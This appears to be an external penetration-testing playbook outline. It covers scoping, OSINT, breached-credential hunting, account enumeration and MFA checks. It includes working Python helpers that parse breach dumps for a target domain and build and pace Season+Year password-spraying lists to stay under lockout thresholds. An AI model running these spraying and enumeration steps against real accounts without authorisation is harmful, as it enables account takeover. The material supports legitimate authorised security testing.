External Pentest Playbook

Rules of Engagement

Verifying the scope

Kicking off

Vulnerability Scanning

Nessus or OpenVAS

Information Gathering / OSINT

Hunting breached credentials

Find breached credentials for the target domain and check the leaked passwords for weak patterns (Season+Year, company name plus digits, "Password1") that point at a poor password policy.

Breach-Parse: a tool for parsing breached credential dumps by domain

DeHashed.com
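The parsing and pattern check described above, as an added example that is not part of the playbook and is not Breach-Parse's or DeHashed's own code. The dump, the domain `example.com` and the company name `Example` are constructed; the pattern labels are the playbook's own (Season+Year, company name, "Password" variants), plus a catch-all for anything ending in a year.

```python
# Added example (not code from the playbook or from Breach-Parse/DeHashed):
# parse a breach dump for one target domain and tally the weak password
# patterns that point at a poor password policy. All data below is constructed.
import re
from collections import Counter

# Constructed sample dump in the usual email:password layout.
SAMPLE_DUMP = """\
alice@example.com:Summer2023!
bob@example.com:Example123
carol@example.com:Winter2022
dave@other.org:correct-horse-battery
erin@example.com:Password1
frank@example.com:example2024
grace@example.com:Tr0ub4dor&3
not a credential line
"""

SEASONS = r"(spring|summer|autumn|fall|winter)"
SEASON_YEAR = re.compile(SEASONS + r"\d{2,4}[!@#$%*.]?")
PASSWORD_VARIANT = re.compile(r"p[a@]ssw[o0]rd\d*[!@#$%*.]?")
YEAR = re.compile(r"(19|20)\d{2}")


def parse_dump(text, domain):
    """Return (email, password) pairs whose mailbox is under `domain`.
    Splits on the first ':' only, so passwords containing ':' survive."""
    domain = "@" + domain.lower()
    creds = []
    for line in text.splitlines():
        email, sep, password = line.partition(":")
        if not sep:
            continue  # not a credential line
        email = email.strip().lower()
        if email.endswith(domain):
            creds.append((email, password))
    return creds


def classify(password, company):
    """Label a password with the first weak pattern it matches, or 'other'."""
    p = password.lower()
    if SEASON_YEAR.fullmatch(p):
        return "season+year"
    if company.lower() in p:
        return "company-name"
    if PASSWORD_VARIANT.fullmatch(p):
        return "password-variant"
    if YEAR.search(p):
        return "contains-year"
    return "other"


def pattern_summary(creds, company):
    """Count patterns across the domain's leaked passwords and return
    (counter, fraction_weak). Anything not 'other' counts as weak."""
    counts = Counter(classify(pw, company) for _, pw in creds)
    weak = sum(n for label, n in counts.items() if label != "other")
    return counts, (weak / len(creds) if creds else 0.0)


if __name__ == "__main__":
    creds = parse_dump(SAMPLE_DUMP, "example.com")
    counts, frac = pattern_summary(creds, "Example")
    for label, n in counts.most_common():
        print(f"{label:17} {n}")
    print(f"weak fraction: {frac:.0%}")
```

A high weak fraction is the signal worth putting in the report: it shows the policy tolerates guessable patterns, and the dominant labels tell you which candidates to try first when spraying.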

Enumerating Valid Accounts

Use the "Forgot password" flow and check whether the response reveals that the email address exists.

Analyse the password policy (lockout threshold, observation window, complexity rules) to decide whether password spraying is worthwhile and how fast it can safely run.

Attacking Login Portals

Password Spraying

TREVORspray

Password spraying tool for Office 365 logins

Burp Suite

Capture the login request and run an Intruder attack on it (cluster bomb, with the username list and a short password list as the two payload sets) to spray it.
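Turning the policy analysis above into a spray schedule, as an added example that is not part of the playbook and is not TREVORspray's or Burp's own code. The company name, years and lockout policy (threshold 5, 30-minute observation window) are constructed; the threshold-0 case follows the Windows meaning of "never lock out".

```python
# Added example (not the playbook's own code, nor TREVORspray's): build a
# spray list from the weak patterns breach data tends to show, and split it
# into rounds that stay under a constructed lockout policy.

def build_spray_list(company, years, seasons=("Spring", "Summer", "Autumn", "Winter")):
    """Season+Year and Company+Year candidates, each with and without '!'."""
    candidates = []
    for year in years:
        for base in (*seasons, company):
            candidates.append(f"{base}{year}")
            candidates.append(f"{base}{year}!")
    return candidates


def plan_spray(passwords, lockout_threshold, window_minutes, margin=2):
    """Group passwords into rounds so that each account sees at most
    lockout_threshold - margin failures per observation window (the margin
    leaves room for the user's own typos). A threshold of 0 means the
    policy never locks accounts, so everything can go in one round.
    Returns [(start_minute, passwords_for_that_round), ...]."""
    passwords = list(passwords)
    if lockout_threshold == 0:
        return [(0, passwords)]
    per_round = lockout_threshold - margin
    if per_round < 1:
        raise ValueError("lockout threshold too low to spray without locking accounts")
    return [
        (i // per_round * window_minutes, passwords[i:i + per_round])
        for i in range(0, len(passwords), per_round)
    ]


def spray_duration_minutes(passwords, lockout_threshold, window_minutes, margin=2):
    """Wall-clock time from the first round start to the last; 0 when one round suffices."""
    rounds = plan_spray(passwords, lockout_threshold, window_minutes, margin)
    return rounds[-1][0] if rounds else 0


if __name__ == "__main__":
    # Constructed policy: lock after 5 failures, counter resets after 30 minutes.
    candidates = build_spray_list("Example", [2024])
    for start, batch in plan_spray(candidates, lockout_threshold=5, window_minutes=30):
        print(f"t+{start:>3} min: {', '.join(batch)}")
    print("total:", spray_duration_minutes(candidates, 5, 30), "minutes")
```

Each round is one TREVORspray run or one Intruder cluster bomb payload set; wait out the observation window ("Reset account lockout counter after" in a Windows policy) before starting the next. If the total duration does not fit the engagement window, that is the answer to "is it worth spraying" for this target.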

MFA Bypassing

MFASweep

PowerShell script that attempts to log in to various Microsoft services with a given set of credentials and reports, per service, whether MFA is enforced.

Escalating Access

Report writing

TCM-Security-Sample-Pentest-Report